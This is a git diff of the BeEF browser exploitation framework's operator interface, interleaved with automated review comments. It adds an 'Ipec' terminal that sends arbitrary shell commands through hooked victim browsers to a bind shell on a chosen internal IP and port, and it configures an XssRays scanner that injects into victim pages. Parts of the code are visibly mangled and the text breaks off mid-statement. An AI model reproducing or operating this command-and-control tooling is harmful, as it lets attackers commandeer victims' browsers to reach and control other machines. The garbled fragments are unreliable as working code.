@@ -21,7 +21,7 @@ encoded+=': ';} for(var i=0;i=0||hex[cc]==null){encoded+=ch;continue;} +encoded+=encodeURIComponent(input);encoded+=attr?'"':'';return encoded;},encodeForJavascript:function(input){hasBeenInitialized=true;immune=default_immune['js'];var encoded='';for(var i=0;i=0||hex[cc]==null){encoded+=ch;continue;} var temp=cc.toString(16),pad;if(cc<256){pad='00'.substr(temp.length);encoded+='\\x'+pad+temp.toUpperCase();}else{pad='0000'.substr(temp.length);encoded+='\\u'+pad+temp.toUpperCase();}} return encoded;},canonicalize:function(input,strict){hasBeenInitialized=true;if(input===null)return null;var out=input,cycle_out=input;var decodeCount=0,cycles=0;var codecs=[new HTMLEntityCodec(),new PercentCodec(),new CSSCodec()];while(true){cycle_out=out;for(var i=0;i "; - text += " "; - text += zombie_array[index]["ip"]; + + var ip = zombie_array[index]["ip"]; + var session = zombie_array[index]["session"]; + var browser_name = zombie_array[index]["browser_name"]; + var browser_version = zombie_array[index]["browser_version"]; + var browser_icon = zombie_array[index]["browser_icon"]; + var os_icon = zombie_array[index]["os_icon"]; + var os_name = zombie_array[index]["os_name"]; + var hw_name = zombie_array[index]["hw_name"]; + var hw_icon = zombie_array[index]["hw_icon"]; + var domain = zombie_array[index]["domain"]; + var port = zombie_array[index]["port"]; + var has_flash = zombie_array[index]["has_flash"]; + var has_web_sockets = zombie_array[index]["has_web_sockets"]; + var has_googlegears = zombie_array[index]["has_googlegears"]; + var has_java = zombie_array[index]["has_java"]; + var date_stamp = zombie_array[index]["date_stamp"]; + + text = " "; + text+= " "; + text+= " "; + text+= ip; + + balloon_text = "IP: " + ip; + balloon_text+= "
Browser: " + browser_name + " " + browser_version; + balloon_text+= "
System: " + os_name; + balloon_text+= "
Hardware: " + hw_name; + balloon_text+= "
Domain: " + domain + ":" + port; + balloon_text+= "
Flash: " + has_flash; + balloon_text+= "
Java: " + has_java; + balloon_text+= "
Web Sockets: " + has_web_sockets; + balloon_text+= "
Google Gears: " + has_googlegears; + balloon_text+= "
Date: " + date_stamp; var new_zombie = { - 'id' : index, - 'ip' : zombie_array[index]["ip"], - 'session' : zombie_array[index]["session"], - 'text': text, - 'check' : false, - 'domain' : zombie_array[index]["domain"], - 'port' : zombie_array[index]["port"] + 'id' : index, + 'ip' : ip, + 'session' : session, + 'text' : text, + 'balloon_text' : balloon_text, + 'check' : false, + 'domain' : domain, + 'port' : port }; return new_zombie; diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js index df8129193..8e5f15a71 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/common.js +++ b/extensions/admin_ui/media/javascript/ui/panel/common.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + var zombie_execute_button_text = 'Execute' var zombie_reexecute_button_text = 'Re-execute' var re_execute_command_title = 'Re-execute command' diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js index bf9bb7357..1a03cf59a 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js 
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /* * The command tab panel. Listing the list of commands sent to the zombie. * Loaded in /ui/panel/index.html diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js index 9e038cff2..e80c39d42 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /* * The main Tab panel for the selected zombie. */ diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js new file mode 100644 index 000000000..6f8b2f77f --- /dev/null +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js 
@@ -0,0 +1,257 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/* + * The Ipec Tab panel for the selected zombie. + */ + +ZombieTab_IpecTab = function(zombie) { + + var commands_statusbar = new Beef_StatusBar('ipec-bbar-zombie-'+zombie.session); + + var ipec_config_panel = new Ext.Panel({ + id: 'ipec-config-zombie-'+zombie.session, + title: 'Scan Config', + layout: 'fit', + autoscroll: true + }); + + function get_rest_token(){ + var token = ""; + var url = "/ui/modules/getRestfulApiToken.json"; + $jwterm.ajax({ + contentType: 'application/json', + dataType: 'json', + type: 'GET', + url: url, + async: false, + processData: false, + success: function(data){ + token = data.token; + console.log(token); + }, + error: function(){ + console.log("Error getting RESTful API token"); + } + }); + return token; + } + + function get_module_id(name, token){ + var id = ""; + var url = "/api/modules/search/" + name + "?token=" + token; + $jwterm.ajax({ + contentType: 'application/json', + dataType: 'json', + type: 'GET', + url: url, + async: false, + processData: false, + success: function(data){ + id = data.id; + }, + error: function(){ + console.log("Error getting module id."); + } + }); + return id; + } + + + function escape_html(str) { + str = str.toString(); + str = str.replace(//g, '>'); +// str = str.replace(/\u0022/g, '"'); + str = str.replace(/\u0027/g, '''); + str = str.replace(/\"\"/g, ''); + str = str.replace(/\\r/g, ''); + str = str.replace(/\\n/g, '
'); + str = str.replace(/\\\\/g, '\\'); + str = str.replace(/\\t/g, '    '); +// str = str.replace(/\\/g, '\'); + return str; + } + + function validateNumber(input, min, max) { + var value = parseInt(input); + return (!isNaN(value) && value >= min && value <= max); + } + + + function initTerminal(zombie){ + String.prototype.reverse = function() { + return this.split('').reverse().join(''); + }; + + $jwterm( document ).ready( function() { + $jwterm('#wterm').wterm( { WIDTH: '100%', HEIGHT: '100%', WELCOME_MESSAGE: 'Welcome to BeEF Bind interactive shell. To Begin Using type \'help\'' }); + }); + + var target_ip = ""; + var target_port = ""; + + var command_directory = { + + 'target': function(tokens){ + var ip_regex = new RegExp('^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$'); + target_ip = tokens[1]; + target_port = tokens[2]; + if(ip_regex.test(target_ip) && validateNumber(target_port, 1, 65535)){ + return "Target is now " + tokens[1] + ":" + tokens[2]; + }else{ + return "Target error: invalid IP or port."; + } + }, + + 'exec': function(tokens){ + if(target_ip.length == 0 || target_port.length == 0) + return "Error: target ip or port not set." 
+ + tokens.shift(); //remove the first element (exec) + var cmd = tokens.join(' '); //needed in case of commands with options + cmd = cmd.replace(/\\/g, '\\\\'); //needed to prevent JS errors (\ need to be escaped) + + var token = get_rest_token(); + var mod_id = get_module_id("BeEF_bind_shell", token); + + var uri = "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token; + + var result = null; + + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"rhost":target_ip, "rport":target_port, "path":"/", "cmd":cmd}), + dataType: 'json', + type: 'POST', + url: uri, + async: false, + processData: false, + success: function(data){ + console.log("data: " + data.command_id); + result = "Command [" + data.command_id + "] sent successfully"; + }, + error: function(){ + console.log("Error sending command"); + return "Error sending command"; + } + }); + + return result; + }, + + 'get': function(tokens){ + var command_id = tokens[1]; + + if(command_id != null){ + + var token = get_rest_token(); + var mod_id = get_module_id("BeEF_bind_shell", token); + + var uri_results = "/api/modules/" + zombie.session + "/" + mod_id + "/" + + command_id + "?token=" + token; + var results = ""; + $jwterm.ajax({ + contentType: 'application/json', + dataType: 'json', + type: 'GET', + url: uri_results, + async: false, + processData: false, + success: function(data){ + $jwterm.each(data, function(i){ + console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data); + results += $jwterm.parseJSON(data[i].data).data; + }); + + }, + error: function(){ + console.log("Error sending command"); + return "Error sending command"; + } + }); + results = escape_html(results); + if(results.charAt(0) == '"' && results.charAt(results.length-1) == '"') + results = results.slice(1,results.length-1); + + return results; + } + }, + + 'strrev': { + PS1: 'strrev $', + + EXIT_HOOK: function() { + return 'exit interface commands'; + }, + + START_HOOK: function() { + return 
'exit interface commands'; + }, + + DISPATCH: function( tokens ) { + return tokens.join('').reverse(); + } + } + }; + + for( var j in command_directory ) { + $jwterm.register_command( j, command_directory[j] ); + } + + $jwterm.register_command( 'help', function() { + return 'target - Usage: target <IP> <port> - Send commands to the specified IP:port
' + + 'exec - Usage exec <command> <command options> - Exec a command, returns the command id.
' + + 'get - Usage get <command id> - Retrieve command results given a specified command id.
' + + }); + }; + + + var ipec_terminal_panel = new Ext.Panel({ + id: 'ipec-terminal-zombie-'+zombie.session, + title: 'Terminal', + layout: 'fit', + padding: '1 1 1 1', + autoScroll: true, + html: "
", + listeners: { + afterrender : function(){ + initTerminal(zombie); + } + } + + }); + + function createIpecTerminalPanel(zombie, bar, value) { + + panel = Ext.getCmp('ipec-config-zombie-'+zombie.session); + panel.setTitle('Prompt'); + panel.add(ipec_terminal_panel); + } + + ZombieTab_IpecTab.superclass.constructor.call(this, { + id: 'ipec-log-tab-'+zombie.session, + title: 'Ipec', + activeTab: 0, + viewConfig: { + forceFit: true, + type: 'fit', + autoScroll:true + }, + items: [ipec_config_panel], + bbar: commands_statusbar, + listeners: { + afterrender : function(){ + createIpecTerminalPanel(zombie, commands_statusbar); + }, + autoScroll:true + + } + }); +}; + +Ext.extend(ZombieTab_IpecTab, Ext.TabPanel, {} ); \ No newline at end of file diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js index e0c8ac7dd..cd57346b2 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /* * The log Tab panel for the selected zombie. */ 
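Review bot: `get_rest_token` writes the REST API token to the browser console with `console.log(token);`, and every later request carries the same token in the URL as `?token=`, so the credential ends up in console history and in any access log along the path; the `console.log` line should be dropped. In the `target` command, `new RegExp('^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$')` loses its backslash inside the string literal, so the separator matches any character; the regex literal `var ip_regex = /^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/;` keeps the dot literal. `target_ip` and `target_port` are also assigned before the check runs, so a rejected value stays set and is still used by `exec`; they should be assigned only inside the success branch. The `return "Error sending command"` statements inside the `error` callbacks return from the callback rather than from the command, so the caller receives `null` or an empty string instead of the message.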
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js index 6d7eaf5dc..ed30b2e8d 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /* * The request Tab panel for the selected zombie. * Loaded in /ui/panel/index.html diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js index 093377010..c9c549e4f 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js 
@@ -1,172 +1,163 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/* - * The XssRays Tab panel for the selected zombie. - */ - -//TODO: fix positioning issues, probably because we are not creating a nested (fucking) panel -ZombieTab_XssRaysTab = function(zombie) { - - var commands_statusbar = new Beef_StatusBar('xssrays-bbar-zombie-'+zombie.session); - - var req_pagesize = 30; - - var xssrays_config_panel = new Ext.Panel({ - id: 'xssrays-config-zombie-'+zombie.session, - title: 'Scan Config', - layout: 'fit' - }); - - var xssrays_logs_store = new Ext.ux.data.PagingJsonStore({ - storeId: 'xssrays-logs-store-zombie-' + zombie.session, - url: '/ui/xssrays/zombie.json', - remoteSort: false, - autoDestroy: true, - autoLoad: false, - root: 'logs', - - fields: ['id', 'vector_method', 'vector_name', 'vector_poc'], - sortInfo: {field: 'id', direction: 'DESC'}, - - baseParams: { - nonce: Ext.get("nonce").dom.value, - zombie_session: zombie.session - } - }); - - var xssrays_logs_bbar = new Ext.PagingToolbar({ - pageSize: req_pagesize, - store: xssrays_logs_store, - displayInfo: true, - displayMsg: 'Displaying history {0} - {1} of {2}', - emptyMsg: 'No history to display' - }); - - var xssrays_logs_grid = new Ext.grid.GridPanel({ - id: 'xssrays-logs-grid-zombie-' + zombie.session, - store: xssrays_logs_store, - bbar: xssrays_logs_bbar, - border: false, - loadMask: {msg:'Loading History...'}, - - viewConfig: { 
- forceFit:true - }, - - view: new Ext.grid.GridView({ - forceFit: true, - emptyText: "No History", - enableRowBody:true - }), - - columns: [ - {header: 'Id', width: 10, sortable: true, dataIndex: 'id', hidden:true}, - {header: 'Vector Method', width: 30, sortable: true, dataIndex: 'vector_method', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}, - {header: 'Vector Name', width: 40, sortable: true, dataIndex: 'vector_name', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}, - {header: 'Vector PoC', sortable: true, dataIndex: 'vector_poc', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}} - ], - - listeners: { - afterrender: function(datagrid) { - datagrid.store.reload({params:{start:0,limit:req_pagesize, sort: "date", dir:"DESC"}}); - } - } - }); - - var xssrays_logs_panel = new Ext.Panel({ - id: 'xssrays-logs-panel-zombie-'+zombie.session, - title: 'Logs', - items:[xssrays_logs_grid], - layout: 'fit', - - listeners: { - activate: function(xssrays_logs_panel) { - xssrays_logs_panel.items.items[0].store.reload(); - } - } - }); - - function genScanSettingsPanel(zombie, bar, value) { - var form = new Ext.FormPanel({ - title: 'Scan settings', - id: 'xssrays-config-form-zombie'+zombie.session, - url: '/ui/xssrays/createNewScan', - labelWidth: 230, - border: false, - padding: '3px 5px 0 5px', - defaults: {width: 100}, - defaultType: 'textfield', - - items:[{ - fieldLabel: 'Clean Timeout (milliseconds before the injected iFrames are removed from the DOM)', - name: 'clean_timeout', - allowBlank:false, - value: 5000, - padding: '10px 5px 0 5px' - },{ - xtype:'checkbox', - fieldLabel: 'Cross-domain (check for XSS on cross-domain resources)', - name: 'cross_domain', - checked: true - }], - - buttons: [{ - text: 'Start Scan', - handler: function() { - var form = Ext.getCmp('xssrays-config-form-zombie'+zombie.session).getForm(); - - bar.update_sending('Saving settings and ready to start XssRays... 
' + zombie.ip + '...'); - - form.submit({ - params: { - nonce: Ext.get("nonce").dom.value, - zombie_session: zombie.session - }, - success: function() { - bar.update_sent("Scan settings saved for hooked browser [" + zombie.ip + "]. XssRays will be added to victim DOM on next polling."); - }, - failure: function() { - bar.update_fail("Error! Something went wrong saving scan settings."); - } - }); - } - }] - }); - - panel = Ext.getCmp('xssrays-config-zombie-'+zombie.session); - panel.setTitle('Scan Config'); - panel.add(form); - } - - ZombieTab_XssRaysTab.superclass.constructor.call(this, { - id: 'xssrays-log-tab-'+zombie.session, - title: 'XssRays', - activeTab: 0, - viewConfig: { - forceFit: true, - type: 'fit' - }, - items: [xssrays_logs_panel, xssrays_config_panel], - bbar: commands_statusbar, - listeners: { - afterrender : function(){ - genScanSettingsPanel(zombie, commands_statusbar); - } - } - }); -}; - +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/* + * The XssRays Tab panel for the selected zombie. 
+ */ + +//TODO: fix positioning issues, probably because we are not creating a nested (fucking) panel +ZombieTab_XssRaysTab = function(zombie) { + + var commands_statusbar = new Beef_StatusBar('xssrays-bbar-zombie-'+zombie.session); + + var req_pagesize = 30; + + var xssrays_config_panel = new Ext.Panel({ + id: 'xssrays-config-zombie-'+zombie.session, + title: 'Scan Config', + layout: 'fit' + }); + + var xssrays_logs_store = new Ext.ux.data.PagingJsonStore({ + storeId: 'xssrays-logs-store-zombie-' + zombie.session, + url: '/ui/xssrays/zombie.json', + remoteSort: false, + autoDestroy: true, + autoLoad: false, + root: 'logs', + + fields: ['id', 'vector_method', 'vector_name', 'vector_poc'], + sortInfo: {field: 'id', direction: 'DESC'}, + + baseParams: { + nonce: Ext.get("nonce").dom.value, + zombie_session: zombie.session + } + }); + + var xssrays_logs_bbar = new Ext.PagingToolbar({ + pageSize: req_pagesize, + store: xssrays_logs_store, + displayInfo: true, + displayMsg: 'Displaying history {0} - {1} of {2}', + emptyMsg: 'No history to display' + }); + + var xssrays_logs_grid = new Ext.grid.GridPanel({ + id: 'xssrays-logs-grid-zombie-' + zombie.session, + store: xssrays_logs_store, + bbar: xssrays_logs_bbar, + border: false, + loadMask: {msg:'Loading History...'}, + + viewConfig: { + forceFit:true + }, + + view: new Ext.grid.GridView({ + forceFit: true, + emptyText: "No History", + enableRowBody:true + }), + + columns: [ + {header: 'Id', width: 10, sortable: true, dataIndex: 'id', hidden:true}, + {header: 'Vector Method', width: 30, sortable: true, dataIndex: 'vector_method', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}, + {header: 'Vector Name', width: 40, sortable: true, dataIndex: 'vector_name', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}, + {header: 'Vector PoC', sortable: true, dataIndex: 'vector_poc', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}} + ], + + listeners: { + 
afterrender: function(datagrid) { + datagrid.store.reload({params:{start:0,limit:req_pagesize, sort: "date", dir:"DESC"}}); + } + } + }); + + var xssrays_logs_panel = new Ext.Panel({ + id: 'xssrays-logs-panel-zombie-'+zombie.session, + title: 'Logs', + items:[xssrays_logs_grid], + layout: 'fit', + + listeners: { + activate: function(xssrays_logs_panel) { + xssrays_logs_panel.items.items[0].store.reload(); + } + } + }); + + function genScanSettingsPanel(zombie, bar, value) { + var form = new Ext.FormPanel({ + title: 'Scan settings', + id: 'xssrays-config-form-zombie'+zombie.session, + url: '/ui/xssrays/createNewScan', + labelWidth: 230, + border: false, + padding: '3px 5px 0 5px', + defaults: {width: 100}, + defaultType: 'textfield', + + items:[{ + fieldLabel: 'Clean Timeout (milliseconds before the injected iFrames are removed from the DOM)', + name: 'clean_timeout', + allowBlank:false, + value: 5000, + padding: '10px 5px 0 5px' + },{ + xtype:'checkbox', + fieldLabel: 'Cross-domain (check for XSS on cross-domain resources)', + name: 'cross_domain', + checked: true + }], + + buttons: [{ + text: 'Start Scan', + handler: function() { + var form = Ext.getCmp('xssrays-config-form-zombie'+zombie.session).getForm(); + + bar.update_sending('Saving settings and ready to start XssRays... ' + zombie.ip + '...'); + + form.submit({ + params: { + nonce: Ext.get("nonce").dom.value, + zombie_session: zombie.session + }, + success: function() { + bar.update_sent("Scan settings saved for hooked browser [" + zombie.ip + "]. XssRays will be added to victim DOM on next polling."); + }, + failure: function() { + bar.update_fail("Error! 
Something went wrong saving scan settings."); + } + }); + } + }] + }); + + panel = Ext.getCmp('xssrays-config-zombie-'+zombie.session); + panel.setTitle('Scan Config'); + panel.add(form); + } + + ZombieTab_XssRaysTab.superclass.constructor.call(this, { + id: 'xssrays-log-tab-'+zombie.session, + title: 'XssRays', + activeTab: 0, + viewConfig: { + forceFit: true, + type: 'fit' + }, + items: [xssrays_logs_panel, xssrays_config_panel], + bbar: commands_statusbar, + listeners: { + afterrender : function(){ + genScanSettingsPanel(zombie, commands_statusbar); + } + } + }); +}; + Ext.extend(ZombieTab_XssRaysTab, Ext.TabPanel, {} ); \ No newline at end of file diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js index 5537ee34e..1af9cf2c9 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js +++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /* * The zombie panel located on the left hand side of the interface. */ 
@@ -36,6 +27,7 @@ zombiesTreeList = function(id) { //the tree node that contains the list of online hooked browsers this.online_hooked_browsers_treenode = this.root.appendChild( new Ext.tree.TreeNode({ + qtip: "Online hooked browsers", text:'Online Browsers', cls:'online-zombies-node', expanded:true @@ -45,6 +37,7 @@ zombiesTreeList = function(id) { //the tree node that contains the list of offline hooked browsers this.offline_hooked_browsers_treenode = this.root.appendChild( new Ext.tree.TreeNode({ + qtip: "Offline hooked browsers", text:'Offline Browsers', cls:'offline-zombies-node', expanded:false @@ -183,7 +176,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { */ addZombie: function(hooked_browser, online, checkbox) { var hb_id, mother_node, node; - + if(online) { hb_id = 'zombie-online-' + hooked_browser.session; mother_node = this.online_hooked_browsers_treenode; @@ -193,7 +186,9 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { } var exists = this.getNodeById(hb_id); if(exists) return; - + + hooked_browser.qtip = hooked_browser.balloon_text; + //save a new online HB if(online && Ext.pluck(this.online_hooked_browsers_array, 'session').indexOf(hooked_browser.session)==-1) { this.online_hooked_browsers_array.push(hooked_browser); @@ -216,7 +211,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { //creates a new node for that hooked browser node = new Ext.tree.TreeNode(hooked_browser); - + //creates a sub-branch for that HB if necessary mother_node = this.addSubFolder(mother_node, hooked_browser[this.tree_configuration['sub-branch']], checkbox); @@ -253,6 +248,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { sub_folder_node = new Ext.tree.TreeNode({ id: 'sub-folder-'+folder, text: folder, + qtip: "Browsers hooked on "+folder, checked: ((checkbox) ? false : null), type: this.tree_configuration["sub-branch"] }); 
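Review bot: The added `hooked_browser.qtip = hooked_browser.balloon_text;` in addZombie (hunk -193,7 +186,9) passes server-supplied text straight into an Ext quick tip, and Ext 3 quick tips render their text as HTML, so any hooked-browser-reported value inside balloon_text that is not already encoded would be interpreted as markup in the operator's console. Where balloon_text is built is not visible in this diff; if it deliberately carries markup, each interpolated field should be encoded at that point, otherwise encode here with `hooked_browser.qtip = $jEncoder.encoder.encodeForHTML(hooked_browser.balloon_text);`, the encoder the XssRays grid renderers in this commit already use. The same applies to the sub-folder tip in hunk -253,6 +248,7, where `folder` is passed in from `hooked_browser[this.tree_configuration['sub-branch']]`: `qtip: "Browsers hooked on "+$jEncoder.encoder.encodeForHTML(folder),`. Both enclosing functions start and end outside their hunks.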
diff --git a/extensions/admin_ui/media/javascript/ux/PagingStore.js b/extensions/admin_ui/media/javascript/ux/PagingStore.js index d8c66b236..0536b4131 100644 --- a/extensions/admin_ui/media/javascript/ux/PagingStore.js +++ b/extensions/admin_ui/media/javascript/ux/PagingStore.js 
@@ -1,568 +1,559 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/* - * PagingStore for Ext 3.2 - v0.5 - */ -Ext.ns('Ext.ux.data'); -Ext.ux.data.PagingStore = Ext.extend(Ext.data.Store, { - add: function (records) { - records = [].concat(records); - if (records.length < 1) { - return; - } - for (var i = 0, len = records.length; i < len; i++) { - records[i].join(this); - } - var index = this.data.length; - this.data.addAll(records); - // *** add *** - if (this.allData) { - this.allData.addAll(records); - } - // *** end *** - if (this.snapshot) { - this.snapshot.addAll(records); - } - // *** add *** - this.totalLength += records.length; - // *** end *** - this.fireEvent('add', this, records, index); - }, - remove: function (record) { - if (Ext.isArray(record)) { - Ext.each(record, function (r) { - this.remove(r); - }, this); - return; - } - // *** add *** - if (this != record.store) { - return; - } - record.join(null); - // *** end *** - var index = this.data.indexOf(record); - if (index > -1) { - // record.join(null); - this.data.removeAt(index); - } - if (this.pruneModifiedRecords) { - this.modified.remove(record); - } - // *** add *** - if (this.allData) { - this.allData.remove(record); - } - // *** end *** - if (this.snapshot) { - this.snapshot.remove(record); - } - // *** add *** - this.totalLength--; - // *** end *** - if (index > -1) { - this.fireEvent('remove', this, record, index); - } - 
}, - removeAll: function (silent) { - // *** add *** - var items = [].concat((this.snapshot || this.allData || this.data).items); - // *** end *** - // var items = []; - // this.each(function (rec) { - // items.push(rec); - // }); - this.clearData(); - // if (this.snapshot) { - // this.snapshot.clear(); - // } - if (this.pruneModifiedRecords) { - this.modified = []; - } - // *** add *** - this.totalLength = 0; - // *** end *** - if (silent !== true) { - this.fireEvent('clear', this, items); - } - }, - insert: function (index, records) { - records = [].concat(records); - for (var i = 0, len = records.length; i < len; i++) { - this.data.insert(index, records[i]); - records[i].join(this); - } - // *** add *** - if (this.allData) { - this.allData.addAll(records); - } - // *** end *** - if (this.snapshot) { - this.snapshot.addAll(records); - } - // *** add *** - this.totalLength += records.length; - // *** end *** - this.fireEvent('add', this, records, index); - }, - getById: function (id) { - // *** add *** - return (this.snapshot || this.allData || this.data).key(id); - // *** end *** - // return this.data.key(id); - }, - clearData: function () { - // *** add *** - if (this.allData) { - this.data = this.allData; - delete this.allData; - } - if (this.snapshot) { - this.data = this.snapshot; - delete this.snapshot; - } - // *** end *** - this.data.each(function (rec) { - rec.join(null); - }); - this.data.clear(); - }, - execute: function (action, rs, options, batch) { - if (!Ext.data.Api.isAction(action)) { - throw new 